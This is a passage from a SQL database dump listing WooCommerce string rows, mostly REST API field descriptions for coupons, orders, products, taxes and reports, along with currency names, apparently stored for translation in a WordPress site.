timezone.','','woocommerce',0),(464,'The date the coupon was created, as GMT.','','woocommerce',0),(465,'The date the coupon was last modified, in the site\'s timezone.','','woocommerce',0),(466,'The date the coupon was last modified, as GMT.','','woocommerce',0),(467,'Determines the type of discount that will be applied.','','woocommerce',0),(468,'Percentage discount','','woocommerce',0),(469,'Fixed cart discount','','woocommerce',0),(470,'Fixed product discount','','woocommerce',0),(471,'Coupon description.','','woocommerce',0),(472,'The date the coupon expires, in the site\'s timezone.','','woocommerce',0),(473,'The date the coupon expires, as GMT.','','woocommerce',0),(474,'Number of times the coupon has been used already.','','woocommerce',0),(475,'If true, the coupon can only be used individually. Other applied coupons will be removed from the cart.','','woocommerce',0),(476,'List of product IDs the coupon can be used on.','','woocommerce',0),(477,'List of product IDs the coupon cannot be used on.','','woocommerce',0),(478,'How many times the coupon can be used in total.','','woocommerce',0),(479,'How many times the coupon can be used per customer.','','woocommerce',0),(480,'Max number of items in the cart the coupon can be applied to.','','woocommerce',0),(481,'If true and if the free shipping method requires a coupon, this coupon will enable free shipping.','','woocommerce',0),(482,'List of category IDs the coupon applies to.','','woocommerce',0),(483,'List of category IDs the coupon does not apply to.','','woocommerce',0),(484,'If true, this coupon will not be applied to items that have sale prices.','','woocommerce',0),(485,'Minimum order amount that needs to be in the cart before coupon applies.','','woocommerce',0),(486,'Maximum order amount allowed when using the coupon.','','woocommerce',0),(487,'List of email addresses that can use this coupon.','','woocommerce',0),(488,'List of user IDs (or guest email addresses) that have used the coupon.','','woocommerce',0),(489,'Meta data.','','woocommerce',0),(490,'Meta ID.','','woocommerce',0),(491,'Limit response to resources published after a given ISO8601 compliant date.','','woocommerce',0),(492,'Limit response to resources published before a given ISO8601 compliant date.','','woocommerce',0),(493,'Limit response to resources modified after a given ISO8601 compliant date.','','woocommerce',0),(494,'Limit response to resources modified before a given ISO8601 compliant date.','','woocommerce',0),(495,'Whether to consider GMT post dates when limiting response by published or modified date.','','woocommerce',0),(496,'Limit result set to resources with a specific code.','','woocommerce',0),(497,'Limit results to coupons with codes matching a given string.','','woocommerce',0),(498,'Whether to bypass trash and force deletion.','','woocommerce',0),(499,'ISO3166 alpha-2 country code.','','woocommerce',0),(500,'Data resource ID.','','woocommerce',0),(501,'Data resource description.','','woocommerce',0),(502,'Parent order ID.','','woocommerce',0),(503,'Order number.','','woocommerce',0),(504,'Order key.','','woocommerce',0),(505,'Shows where the order was created.','','woocommerce',0),(506,'Version of WooCommerce which last updated the order.','','woocommerce',0),(507,'Order status.','','woocommerce',0),(508,'Pending payment','','woocommerce',0),(509,'Processing','','woocommerce',0),(510,'On hold','','woocommerce',0),(511,'Completed','','woocommerce',0),(512,'Cancelled','','woocommerce',0),(513,'Refunded','','woocommerce',0),(514,'Failed','','woocommerce',0),(515,'Currency the order was created with, in ISO format.','','woocommerce',0),(516,'United Arab Emirates dirham','','woocommerce',0),(517,'Afghan afghani','','woocommerce',0),(518,'Albanian lek','','woocommerce',0),(519,'Armenian dram','','woocommerce',0),(520,'Netherlands Antillean guilder','','woocommerce',0),(521,'Angolan kwanza','','woocommerce',0),(522,'Argentine peso','','woocommerce',0),(523,'Australian dollar','','woocommerce',0),(524,'Aruban florin','','woocommerce',0),(525,'Azerbaijani manat','','woocommerce',0),(526,'Bosnia and Herzegovina convertible mark','','woocommerce',0),(527,'Barbadian dollar','','woocommerce',0),(528,'Bangladeshi taka','','woocommerce',0),(529,'Bulgarian lev','','woocommerce',0),(530,'Bahraini dinar','','woocommerce',0),(531,'Burundian franc','','woocommerce',0),(532,'Bermudian dollar','','woocommerce',0),(533,'Brunei dollar','','woocommerce',0),(534,'Bolivian boliviano','','woocommerce',0),(535,'Brazilian real','','woocommerce',0),(536,'Bahamian dollar','','woocommerce',0),(537,'Bitcoin','','woocommerce',0),(538,'Bhutanese ngultrum','','woocommerce',0),(539,'Botswana pula','','woocommerce',0),(540,'Belarusian ruble (old)','','woocommerce',0),(541,'Belarusian ruble','','woocommerce',0),(542,'Belize dollar','','woocommerce',0),(543,'Canadian dollar','','woocommerce',0),(544,'Congolese franc','','woocommerce',0),(545,'Swiss franc','','woocommerce',0),(546,'Chilean peso','','woocommerce',0),(547,'Chinese yuan','','woocommerce',0),(548,'Colombian peso','','woocommerce',0),(549,'Costa Rican col&oacute;n','','woocommerce',0),(550,'Cuban convertible peso','','woocommerce',0),(551,'Cuban peso','','woocommerce',0),(552,'Cape Verdean escudo','','woocommerce',0),(553,'Czech koruna','','woocommerce',0),(554,'Djiboutian franc','','woocommerce',0),(555,'Danish krone','','woocommerce',0),(556,'Dominican peso','','woocommerce',0),(557,'Algerian dinar','','woocommerce',0),(558,'Egyptian pound','','woocommerce',0),(559,'Eritrean nakfa','','woocommerce',0),(560,'Ethiopian birr','','woocommerce',0),(561,'Euro','','woocommerce',0),(562,'Fijian dollar','','woocommerce',0),(563,'Falkland Islands pound','','woocommerce',0),(564,'Pound sterling','','woocommerce',0),(565,'Georgian lari','','woocommerce',0),(566,'Guernsey pound','','woocommerce',0),(567,'Ghana cedi','','woocommerce',0),(568,'Gibraltar pound','','woocommerce',0),(569,'Gambian dalasi','','woocommerce',0),(570,'Guinean franc','','woocommerce',0),(571,'Guatemalan quetzal','','woocommerce',0),(572,'Guyanese dollar','','woocommerce',0),(573,'Hong Kong dollar','','woocommerce',0),(574,'Honduran lempira','','woocommerce',0),(575,'Croatian kuna','','woocommerce',0),(576,'Haitian gourde','','woocommerce',0),(577,'Hungarian forint','','woocommerce',0),(578,'Indonesian rupiah','','woocommerce',0),(579,'Israeli new shekel','','woocommerce',0),(580,'Manx pound','','woocommerce',0),(581,'Indian rupee','','woocommerce',0),(582,'Iraqi dinar','','woocommerce',0),(583,'Iranian rial','','woocommerce',0),(584,'Iranian toman','','woocommerce',0),(585,'Icelandic kr&oacute;na','','woocommerce',0),(586,'Jersey pound','','woocommerce',0),(587,'Jamaican dollar','','woocommerce',0),(588,'Jordanian dinar','','woocommerce',0),(589,'Japanese yen','','woocommerce',0),(590,'Kenyan shilling','','woocommerce',0),(591,'Kyrgyzstani som','','woocommerce',0),(592,'Cambodian riel','','woocommerce',0),(593,'Comorian franc','','woocommerce',0),(594,'North Korean won','','woocommerce',0),(595,'South Korean won','','woocommerce',0),(596,'Kuwaiti dinar','','woocommerce',0),(597,'Cayman Islands dollar','','woocommerce',0),(598,'Kazakhstani tenge','','woocommerce',0),(599,'Lao kip','','woocommerce',0),(600,'Lebanese pound','','woocommerce',0),(601,'Sri Lankan rupee','','woocommerce',0),(602,'Liberian dollar','','woocommerce',0),(603,'Lesotho loti','','woocommerce',0),(604,'Libyan dinar','','woocommerce',0),(605,'Moroccan dirham','','woocommerce',0),(606,'Moldovan leu','','woocommerce',0),(607,'Malagasy ariary','','woocommerce',0),(608,'Macedonian denar','','woocommerce',0),(609,'Burmese kyat','','woocommerce',0),(610,'Mongolian t&ouml;gr&ouml;g','','woocommerce',0),(611,'Macanese pataca','','woocommerce',0),(612,'Mauritanian ouguiya','','woocommerce',0),(613,'Mauritian rupee','','woocommerce',0),(614,'Maldivian rufiyaa','','woocommerce',0),(615,'Malawian kwacha','','woocommerce',0),(616,'Mexican peso','','woocommerce',0),(617,'Malaysian ringgit','','woocommerce',0),(618,'Mozambican metical','','woocommerce',0),(619,'Namibian dollar','','woocommerce',0),(620,'Nigerian naira','','woocommerce',0),(621,'Nicaraguan c&oacute;rdoba','','woocommerce',0),(622,'Norwegian krone','','woocommerce',0),(623,'Nepalese rupee','','woocommerce',0),(624,'New Zealand dollar','','woocommerce',0),(625,'Omani rial','','woocommerce',0),(626,'Panamanian balboa','','woocommerce',0),(627,'Sol','','woocommerce',0),(628,'Papua New Guinean kina','','woocommerce',0),(629,'Philippine peso','','woocommerce',0),(630,'Pakistani rupee','','woocommerce',0),(631,'Polish z&#x142;oty','','woocommerce',0),(632,'Transnistrian ruble','','woocommerce',0),(633,'Paraguayan guaran&iacute;','','woocommerce',0),(634,'Qatari riyal','','woocommerce',0),(635,'Romanian leu','','woocommerce',0),(636,'Serbian dinar','','woocommerce',0),(637,'Russian ruble','','woocommerce',0),(638,'Rwandan franc','','woocommerce',0),(639,'Saudi riyal','','woocommerce',0),(640,'Solomon Islands dollar','','woocommerce',0),(641,'Seychellois rupee','','woocommerce',0),(642,'Sudanese pound','','woocommerce',0),(643,'Swedish krona','','woocommerce',0),(644,'Singapore dollar','','woocommerce',0),(645,'Saint Helena pound','','woocommerce',0),(646,'Sierra Leonean leone','','woocommerce',0),(647,'Somali shilling','','woocommerce',0),(648,'Surinamese dollar','','woocommerce',0),(649,'South Sudanese pound','','woocommerce',0),(650,'S&atilde;o Tom&eacute; and Pr&iacute;ncipe dobra','','woocommerce',0),(651,'Syrian pound','','woocommerce',0),(652,'Swazi lilangeni','','woocommerce',0),(653,'Thai baht','','woocommerce',0),(654,'Tajikistani somoni','','woocommerce',0),(655,'Turkmenistan manat','','woocommerce',0),(656,'Tunisian dinar','','woocommerce',0),(657,'Tongan pa&#x2bb;anga','','woocommerce',0),(658,'Turkish lira','','woocommerce',0),(659,'Trinidad and Tobago dollar','','woocommerce',0),(660,'New Taiwan dollar','','woocommerce',0),(661,'Tanzanian shilling','','woocommerce',0),(662,'Ukrainian hryvnia','','woocommerce',0),(663,'Ugandan shilling','','woocommerce',0),(664,'United States (US) dollar','','woocommerce',0),(665,'Uruguayan peso','','woocommerce',0),(666,'Uzbekistani som','','woocommerce',0),(667,'Venezuelan bol&iacute;var','','woocommerce',0),(668,'Bol&iacute;var soberano','','woocommerce',0),(669,'Vietnamese &#x111;&#x1ed3;ng','','woocommerce',0),(670,'Vanuatu vatu','','woocommerce',0),(671,'Samoan t&#x101;l&#x101;','','woocommerce',0),(672,'Central African CFA franc','','woocommerce',0),(673,'East Caribbean dollar','','woocommerce',0),(674,'West African CFA franc','','woocommerce',0),(675,'CFP franc','','woocommerce',0),(676,'Yemeni rial','','woocommerce',0),(677,'South African rand','','woocommerce',0),(678,'Zambian kwacha','','woocommerce',0),(679,'The date the order was created, in the site\'s timezone.','','woocommerce',0),(680,'The date the order was created, as GMT.','','woocommerce',0),(681,'The date the order was last modified, in the site\'s timezone.','','woocommerce',0),(682,'The date the order was last modified, as GMT.','','woocommerce',0),(683,'Total discount amount for the order.','','woocommerce',0),(684,'Total discount tax amount for the order.','','woocommerce',0),(685,'Total shipping amount for the order.','','woocommerce',0),(686,'Total shipping tax amount for the order.','','woocommerce',0),(687,'Sum of line item taxes only.','','woocommerce',0),(688,'Grand total.','','woocommerce',0),(689,'Sum of all taxes.','','woocommerce',0),(690,'True the prices included tax during checkout.','','woocommerce',0),(691,'User ID who owns the order. 0 for guests.','','woocommerce',0),(692,'Customer\'s IP address.','','woocommerce',0),(693,'User agent of the customer.','','woocommerce',0),(694,'Note left by customer during checkout.','','woocommerce',0),(695,'First name.','','woocommerce',0),(696,'Last name.','','woocommerce',0),(697,'Company name.','','woocommerce',0),(698,'Address line 1','','woocommerce',0),(699,'Address line 2','','woocommerce',0),(700,'City name.','','woocommerce',0),(701,'ISO code or name of the state, province or district.','','woocommerce',0),(702,'Postal code.','','woocommerce',0),(703,'Country code in ISO 3166-1 alpha-2 format.','','woocommerce',0),(704,'Email address.','','woocommerce',0),(705,'Phone number.','','woocommerce',0),(706,'Payment method ID.','','woocommerce',0),(707,'Payment method title.','','woocommerce',0),(708,'Unique transaction ID.','','woocommerce',0),(709,'The date the order was paid, in the site\'s timezone.','','woocommerce',0),(710,'The date the order was paid, as GMT.','','woocommerce',0),(711,'The date the order was completed, in the site\'s timezone.','','woocommerce',0),(712,'The date the order was completed, as GMT.','','woocommerce',0),(713,'MD5 hash of cart items to ensure orders are not modified.','','woocommerce',0),(714,'Line items data.','','woocommerce',0),(715,'Item ID.','','woocommerce',0),(716,'Parent product name if the product is a variation.','','woocommerce',0),(717,'Product ID.','','woocommerce',0),(718,'Variation ID, if applicable.','','woocommerce',0),(719,'Quantity ordered.','','woocommerce',0),(720,'Tax class of product.','','woocommerce',0),(721,'Line subtotal (before discounts).','','woocommerce',0),(722,'Line subtotal tax (before discounts).','','woocommerce',0),(723,'Line total (after discounts).','','woocommerce',0),(724,'Line total tax (after discounts).','','woocommerce',0),(725,'Line taxes.','','woocommerce',0),(726,'Tax rate ID.','','woocommerce',0),(727,'Tax total.','','woocommerce',0),(728,'Tax subtotal.','','woocommerce',0),(729,'Meta key for UI display.','','woocommerce',0),(730,'Meta value for UI display.','','woocommerce',0),(731,'Product SKU.','','woocommerce',0),(732,'Product price.','','woocommerce',0),(733,'Tax lines data.','','woocommerce',0),(734,'Tax rate code.','','woocommerce',0),(735,'Tax rate label.','','woocommerce',0),(736,'Show if is a compound tax rate.','','woocommerce',0),(737,'Tax total (not including shipping taxes).','','woocommerce',0),(738,'Shipping tax total.','','woocommerce',0),(739,'Shipping lines data.','','woocommerce',0),(740,'Shipping method name.','','woocommerce',0),(741,'Shipping method ID.','','woocommerce',0),(742,'Shipping instance ID.','','woocommerce',0),(743,'Fee lines data.','','woocommerce',0),(744,'Tax class of fee.','','woocommerce',0),(745,'Tax status of fee.','','woocommerce',0),(746,'Coupons line data.','','woocommerce',0),(747,'Discount total.','','woocommerce',0),(748,'Discount total tax.','','woocommerce',0),(749,'List of refunds.','','woocommerce',0),(750,'Refund ID.','','woocommerce',0),(751,'Refund reason.','','woocommerce',0),(752,'Refund total.','','woocommerce',0),(753,'Define if the order is paid. It will set the status to processing and reduce stock items.','','woocommerce',0),(754,'Limit result set to orders assigned a specific status.','','woocommerce',0),(755,'Limit result set to orders assigned a specific customer.','','woocommerce',0),(756,'Limit result set to orders assigned a specific product.','','woocommerce',0),(757,'Number of decimal points to use in each resource.','','woocommerce',0),(758,'Limit result set to orders which have specific statuses.','','woocommerce',0),(759,'Limit result set to orders matching part of an order number.','','woocommerce',0),(760,'Product slug.','','woocommerce',0),(761,'The date the product was created, in the site\'s timezone.','','woocommerce',0),(762,'The date the product was created, as GMT.','','woocommerce',0),(763,'The date the product was last modified, in the site\'s timezone.','','woocommerce',0),(764,'The date the product was last modified, as GMT.','','woocommerce',0),(765,'Product status (post status).','','woocommerce',0),(766,'Featured product.','','woocommerce',0),(767,'Catalog visibility.','','woocommerce',0),(768,'Product description.','','woocommerce',0),(769,'Product short description.','','woocommerce',0),(770,'Product regular price.','','woocommerce',0),(771,'Product sale price.','','woocommerce',0),(772,'Start date of sale price, in the site\'s timezone.','','woocommerce',0),(773,'Start date of sale price, as GMT.','','woocommerce',0),(774,'End date of sale price, in the site\'s timezone.','','woocommerce',0),(775,'Price formatted in HTML.','','woocommerce',0),(776,'Shows if the product is on sale.','','woocommerce',0),(777,'Shows if the product can be bought.','','woocommerce',0),(778,'Amount of sales.','','woocommerce',0),(779,'If the product is virtual.','','woocommerce',0),(780,'If the product is downloadable.','','woocommerce',0),(781,'List of downloadable files.','','woocommerce',0),(782,'File ID.','','woocommerce',0),(783,'File name.','','woocommerce',0),(784,'File URL.','','woocommerce',0),(785,'Number of times downloadable files can be downloaded after purchase.','','woocommerce',0),(786,'Number of days until access to downloadable files expires.','','woocommerce',0),(787,'Product external URL. Only for external products.','','woocommerce',0),(788,'Product external button text. Only for external products.','','woocommerce',0),(789,'Tax status.','','woocommerce',0),(790,'Tax class.','','woocommerce',0),(791,'Stock management at product level.','','woocommerce',0),(792,'Stock quantity.','','woocommerce',0),(793,'Controls the stock status of the product.','','woocommerce',0),(794,'If managing stock, this controls if backorders are allowed.','','woocommerce',0),(795,'Shows if backorders are allowed.','','woocommerce',0),(796,'Shows if the product is on backordered.','','woocommerce',0),(797,'Low Stock amount for the product.','','woocommerce',0),(798,'Allow one item to be bought in a single order.','','woocommerce',0),(799,'Product weight (%s).','','woocommerce',0),(800,'Product dimensions.','','woocommerce',0),(801,'Product length (%s).','','woocommerce',0),(802,'Product width (%s).','','woocommerce',0),(803,'Product height (%s).','','woocommerce',0),(804,'Shows if the product need to be shipped.','','woocommerce',0),(805,'Shows whether or not the product shipping is taxable.','','woocommerce',0),(806,'Shipping class slug.','','woocommerce',0),(807,'Shipping class ID.','','woocommerce',0),(808,'Allow reviews.','','woocommerce',0),(809,'Amount of reviews that the product have.','','woocommerce',0),(810,'List of related products IDs.','','woocommerce',0),(811,'List of up-sell products IDs.','','woocommerce',0),(812,'List of cross-sell products IDs.','','woocommerce',0),(813,'Product parent ID.','','woocommerce',0),(814,'Optional note to send the customer after purchase.','','woocommerce',0),(815,'List of categories.','','woocommerce',0),(816,'Category ID.','','woocommerce',0),(817,'Category name.','','woocommerce',0),(818,'Category slug.','','woocommerce',0),(819,'List of tags.','','woocommerce',0),(820,'Tag ID.','','woocommerce',0),(821,'Tag name.','','woocommerce',0),(822,'Tag slug.','','woocommerce',0),(823,'The date the image was created, in the site\'s timezone.','','woocommerce',0),(824,'The date the image was created, as GMT.','','woocommerce',0),(825,'The date the image was last modified, in the site\'s timezone.','','woocommerce',0),(826,'The date the image was last modified, as GMT.','','woocommerce',0),(827,'Image URL.','','woocommerce',0),(828,'List of attributes.','','woocommerce',0),(829,'Attribute ID.','','woocommerce',0),(830,'Attribute position.','','woocommerce',0),(831,'Define if the attribute is visible on the \"Additional information\" tab in the product\'s page.','','woocommerce',0),(832,'Define if the attribute can be used as variation.','','woocommerce',0),(833,'List of available term names of the attribute.','','woocommerce',0),(834,'Defaults variation attributes.','','woocommerce',0),(835,'Selected attribute term name.','','woocommerce',0),(836,'List of variations IDs.','','woocommerce',0),(837,'List of grouped products ID.','','woocommerce',0),(838,'Menu order, used to custom sort products.','','woocommerce',0),(839,'The date the last order for this product was placed, in the site\'s timezone.','','woocommerce',0),(840,'Limit result set to products with a specific slug.','','woocommerce',0),(841,'Limit result set to products assigned a specific status.','','woocommerce',0),(842,'Limit result set to products assigned a specific shipping class ID.','','woocommerce',0),(843,'Limit result set to products with a specific attribute. Use the taxonomy name/attribute slug.','','woocommerce',0),(844,'Limit result set to products with a specific attribute term ID (required an assigned attribute).','','woocommerce',0),(845,'Limit result set to products in stock or out of stock.','','woocommerce',0),(846,'Limit result set to products based on a minimum price.','','woocommerce',0),(847,'Limit result set to products based on a maximum price.','','woocommerce',0),(848,'Limit result set to products that are low or out of stock. (Deprecated)','','woocommerce',0),(849,'Search by similar product name or sku.','','woocommerce',0),(850,'An alphanumeric identifier for the resource unique to its type.','','woocommerce',0),(851,'Type of attribute.','','woocommerce',0),(852,'Select','','woocommerce',0),(853,'Default sort order.','','woocommerce',0),(854,'Enable/Disable attribute archives.','','woocommerce',0),(855,'Search by similar attribute name.','','woocommerce',0),(856,'Name for the resource.','','woocommerce',0),(857,'Required to be true, as resource does not support trashing.','','woocommerce',0),(858,'Slug identifier for the resource.','','woocommerce',0),(859,'Unique identifier for the attribute of the terms.','','woocommerce',0),(860,'HTML description of the resource.','','woocommerce',0),(861,'Menu order, used to custom sort the resource.','','woocommerce',0),(862,'Number of published products for the resource.','','woocommerce',0),(863,'Offset the result set by a specific number of items. Applies to hierarchical taxonomies only.','','woocommerce',0),(864,'Sort collection by resource attribute.','','woocommerce',0),(865,'Whether to hide resources not assigned to any products.','','woocommerce',0),(866,'Limit result set to resources assigned to a specific parent. Applies to hierarchical taxonomies only.','','woocommerce',0),(867,'Limit result set to resources assigned to a specific product.','','woocommerce',0),(868,'Limit result set to resources with a specific slug.','','woocommerce',0),(869,'The ID for the parent of the resource.','','woocommerce',0),(870,'Category archive display type.','','woocommerce',0),(871,'Image data.','','woocommerce',0),(872,'Unique identifier for the variable product.','','woocommerce',0),(873,'The date the variation was created, in the site\'s timezone.','','woocommerce',0),(874,'The date the variation was last modified, in the site\'s timezone.','','woocommerce',0),(875,'Variation description.','','woocommerce',0),(876,'Variation URL.','','woocommerce',0),(877,'Current variation price.','','woocommerce',0),(878,'Variation regular price.','','woocommerce',0),(879,'Variation sale price.','','woocommerce',0),(880,'Shows if the variation is on sale.','','woocommerce',0),(881,'Variation status.','','woocommerce',0),(882,'Shows if the variation can be bought.','','woocommerce',0),(883,'If the variation is virtual.','','woocommerce',0),(884,'If the variation is downloadable.','','woocommerce',0),(885,'Stock management at variation level.','','woocommerce',0),(886,'Shows if the variation is on backordered.','','woocommerce',0),(887,'Low Stock amount for the variation.','','woocommerce',0),(888,'Variation weight (%s).','','woocommerce',0),(889,'Variation dimensions.','','woocommerce',0),(890,'Variation length (%s).','','woocommerce',0),(891,'Variation width (%s).','','woocommerce',0),(892,'Variation height (%s).','','woocommerce',0),(893,'Variation image data.','','woocommerce',0),(894,'Product parent name.','','woocommerce',0),(895,'Search by similar product name, sku, or attribute value.','','woocommerce',0),(896,'Unique identifier for the variation.','','woocommerce',0),(897,'Status of the review.','','woocommerce',0),(898,'Reviewer email.','','woocommerce',0),(899,'Limit response to reviews published before a given ISO8601 compliant date.','','woocommerce',0),(900,'Limit result set to specific IDs.','','woocommerce',0),(901,'Limit result set to reviews assigned to specific user IDs.','','woocommerce',0),(902,'Ensure result set excludes reviews assigned to specific user IDs.','','woocommerce',0),(903,'Limit result set to that from a specific author email.','','woocommerce',0),(904,'Limit result set to reviews assigned to specific product IDs.','','woocommerce',0),(905,'Limit result set to reviews assigned a specific status.','','woocommerce',0),(906,'Unique identifier for the product.','','woocommerce',0),(907,'Review content.','','woocommerce',0),(908,'Name of the reviewer.','','woocommerce',0),(909,'Email of the reviewer.','','woocommerce',0),(910,'Settings group ID.','','woocommerce',0),(911,'A unique identifier for the setting.','','woocommerce',0),(912,'An identifier for the group this setting belongs to.','','woocommerce',0),(913,'A human readable label for the setting used in interfaces.','','woocommerce',0),(914,'A human readable description for the setting used in interfaces.','','woocommerce',0),(915,'Setting value.','','woocommerce',0),(916,'Default value for the setting.','','woocommerce',0),(917,'Additional help text shown to the user about the setting.','','woocommerce',0),(918,'Placeholder text to be displayed in text inputs.','','woocommerce',0),(919,'Type of setting.','','woocommerce',0),(920,'Array of options (key value pairs) for inputs such as select, multiselect, and radio buttons.','','woocommerce',0),(921,'Theme installation status.','','woocommerce',0),(922,'Theme installation message.','','woocommerce',0),(923,'Uploaded theme.','','woocommerce',0),(924,'A zip file of the theme to be uploaded.','','woocommerce',0),(925,'Whether or not the profile was completed.','','woocommerce',0),(926,'Whether or not the profile was skipped.','','woocommerce',0),(927,'Industry.','','woocommerce',0),(928,'Types of products sold.','','woocommerce',0),(929,'Physical products','','woocommerce',0),(930,'Downloads','','woocommerce',0),(931,'Subscriptions','','woocommerce',0),(932,'Memberships','','woocommerce',0),(933,'Bookings','','woocommerce',0),(934,'Bundles','','woocommerce',0),(935,'Customizable products','','woocommerce',0),(936,'Number of products to be added.','','woocommerce',0),(937,'Other places the store is selling products.','','woocommerce',0),(938,'Number of employees of the store.','','woocommerce',0),(939,'Current annual revenue of the store.','','woocommerce',0),(940,'Name of other platform used to sell.','','woocommerce',0),(941,'Name of other platform used to sell (not listed).','','woocommerce',0),(942,'Extra business extensions to install.','','woocommerce',0),(943,'Selected store theme.','','woocommerce',0),(944,'Whether or not this store was setup for a client.','','woocommerce',0),(945,'Whether or not the store was connected to WooCommerce.com during the extension flow.','','woocommerce',0),(946,'Whether or not this store agreed to receiving marketing contents from WooCommerce.com.','','woocommerce',0),(947,'Store email address.','','woocommerce',0),(948,'Product template name.','','woocommerce',0),(949,'List of extended deprecated tasks from the client side filter.','','woocommerce',0),(950,'Time period to snooze the task.','','woocommerce',0),(951,'Optional parameter to query specific task list.','','woocommerce',0),(952,'Country ISO 3166 code.','','woocommerce',0),(953,'State code.','','woocommerce',0),(954,'Postcode / ZIP.','','woocommerce',0),(955,'Tax rate.','','woocommerce',0),(956,'Tax rate name.','','woocommerce',0),(957,'Tax priority.','','woocommerce',0),(958,'Whether or not this is a compound rate.','','woocommerce',0),(959,'Whether or not this tax rate also gets applied to shipping.','','woocommerce',0),(960,'Indicates the order that will appear in queries.','','woocommerce',0),(961,'List of postcodes / ZIPs. Introduced in WooCommerce 5.3.','','woocommerce',0),(962,'List of city names. Introduced in WooCommerce 5.3.','','woocommerce',0),(963,'Postcode/ZIP, it doesn\'t support multiple values. Deprecated as of WooCommerce 5.3, \'postcodes\' should be used instead.','','woocommerce',0),(964,'City name, it doesn\'t support multiple values. Deprecated as of WooCommerce 5.3, \'cities\' should be used instead.','','woocommerce',0),(965,'Sort by tax class.','','woocommerce',0),(966,'Search by similar tax code.','','woocommerce',0),(967,'Limit result set to items that have the specified rate ID(s) assigned.','','woocommerce',0),(968,'Customer ID.','','woocommerce',0),(969,'User ID.','','woocommerce',0),(970,'Name.','','woocommerce',0),(971,'Username.','','woocommerce',0),(972,'Country / Region.','','woocommerce',0),(973,'City.','','woocommerce',0),(974,'Region.','','woocommerce',0),(975,'Date registered.','','woocommerce',0),(976,'Date registered GMT.','','woocommerce',0),(977,'Date last active.','','woocommerce',0),(978,'Date last active GMT.','','woocommerce',0),(979,'Order count.','','woocommerce',0),(980,'Total spend.','','woocommerce',0),(981,'Avg order value.','','woocommerce',0),(982,'Limit response to objects registered before (or at) a given ISO8601 compliant datetime.','','woocommerce',0),(983,'Limit response to objects registered after (or at) a given ISO8601 compliant datetime.','','woocommerce',0),(984,'Limit response to resources with orders published after a given ISO8601 compliant date.','','woocommerce',0),(985,'Limit response to resources with orders published before a given ISO8601 compliant date.','','woocommerce',0),(986,'Indicates whether all the conditions should be true for the resulting set, or if any one of them is sufficient. Match affects the following parameters: status_is, status_is_not, product_includes, product_excludes, coupon_includes, coupon_excludes, customer, categories','','woocommerce',0),(987,'Limit response to objects with a customer field containing the search term. Searches the field provided by `searchby`.','','woocommerce',0),(988,'Limit response to objects with specfic names.','','woocommerce',0),(989,'Limit response to objects excluding specfic names.','','woocommerce',0),(990,'Limit response to objects with specfic usernames.','','woocommerce',0),(991,'Limit response to objects excluding specfic usernames.','','woocommerce',0),(992,'Limit response to objects including emails.','','woocommerce',0),(993,'Limit response to objects excluding emails.','','woocommerce',0),(994,'Limit response to objects with specfic countries.','','woocommerce',0),(995,'Limit response to objects excluding specfic countries.','','woocommerce',0),(996,'Limit response to objects last active before (or at) a given ISO8601 compliant datetime.','','woocommerce',0),(997,'Limit response to objects last active after (or at) a given ISO8601 compliant datetime.','','woocommerce',0),(998,'Limit response to objects last active between two given ISO8601 compliant datetime.','','woocommerce',0),(999,'Limit response to objects with an order count greater than or equal to given integer.','','woocommerce',0),(1000,'Limit response to objects with an order count less than or equal to given integer.','','woocommerce',0),(1001,'Limit response to objects with an order count between two given integers.','','woocommerce',0),(1002,'Limit response to objects with a total order spend greater than or equal to given number.','','woocommerce',0),(1003,'Limit response to objects with a total order spend less than or equal to given number.','','woocommerce',0),(1004,'Limit response to objects with a total order spend between two given numbers.','','woocommerce',0),(1005,'Limit response to objects with an average order spend greater than or equal to given number.','','woocommerce',0),(1006,'Limit response to objects with an average order spend less than or equal to given number.','','woocommerce',0),(1007,'Limit response to objects with an average order spend between two given numbers.','','woocommerce',0),(1008,'Limit response to objects with last order before (or at) a given ISO8601 compliant datetime.','','woocommerce',0),(1009,'Limit response to objects with last order after (or at) a given ISO8601 compliant datetime.','','woocommerce',0),(1010,'Limit result to items with specified customer ids.','','woocommerce',0),(1011,'URL query to persist across links.','','woocommerce',0),(1012,'An alphanumeric identifier for the resource.','','woocommerce',0),(1013,'A human-readable description of the resource.','','woocommerce',0),(1014,'API path.','','woocommerce',0),(1015,'Number of days to import.','','woocommerce',0),(1016,'Skip importing existing order data.','','woocommerce',0),(1017,'Parameters to pass on to the exported report.','','woocommerce',0),(1018,'When true, email a link to download the export to the requesting user.','','woocommerce',0),(1019,'Number of items sold.','','woocommerce',0),(1020,'Total Net sales of all items sold.','','woocommerce',0),(1021,'Number of orders product appeared in.','','woocommerce',0),(1022,'Product image.','','woocommerce',0),(1023,'Product link.','','woocommerce',0),(1024,'Product category IDs.','','woocommerce',0),(1025,'Product inventory status.','','woocommerce',0),(1026,'Product inventory quantity.','','woocommerce',0),(1027,'Product inventory threshold for low stock.','','woocommerce',0),(1028,'Product variations IDs.','','woocommerce',0),(1029,'Limit result to items from the specified categories.','','woocommerce',0),(1030,'Limit result to items with specified product ids.','','woocommerce',0),(1031,'Add additional piece of info about each product to the report.','','woocommerce',0),(1032,'Product attributes.','','woocommerce',0),(1033,'Limit result set to items that have the specified parent product(s).','','woocommerce',0),(1034,'Limit result set to items that don\'t have the specified parent product(s).','','woocommerce',0),(1035,'Limit result to items with specified variation ids.','','woocommerce',0),(1036,'Add additional piece of info about each variation to the report.','','woocommerce',0),(1037,'Limit result set to variations that include the specified attributes.','','woocommerce',0),(1038,'Limit result set to variations that don\'t include the specified attributes.','','woocommerce',0),(1039,'Limit result set to variations in the specified categories.','','woocommerce',0),(1040,'Limit result set to variations not in the specified categories.','','woocommerce',0),(1041,'Products sold','','woocommerce',0),(1042,'Number of product items sold.','','woocommerce',0),(1043,'Net sales.','','woocommerce',0),(1044,'Number of orders.','','woocommerce',0),(1045,'Reports data grouped by segment condition.','','woocommerce',0),(1046,'Segment identificator.','','woocommerce',0),(1047,'Human readable segment label, either product or variation name.','','woocommerce',0),(1048,'Interval subtotals.','','woocommerce',0),(1049,'Totals data.','','woocommerce',0),(1050,'Reports data grouped by intervals.','','woocommerce',0),(1051,'Type of interval.','','woocommerce',0),(1052,'The date the report start, in the site\'s timezone.','','woocommerce',0),(1053,'The date the report start, as GMT.','','woocommerce',0),(1054,'The date the report end, in the site\'s timezone.','','woocommerce',0),(1055,'The date the report end, as GMT.','','woocommerce',0),(1056,'Time interval to use for buckets in the returned data.','','woocommerce',0),(1057,'Segment the response by additional constraint.','','woocommerce',0),(1058,'Limit stats fields to the specified items.','','woocommerce',0),(1059,'Variations Sold','','woocommerce',0),(1060,'Number of variation items sold.','','woocommerce',0),(1061,'Limit result set to orders that include 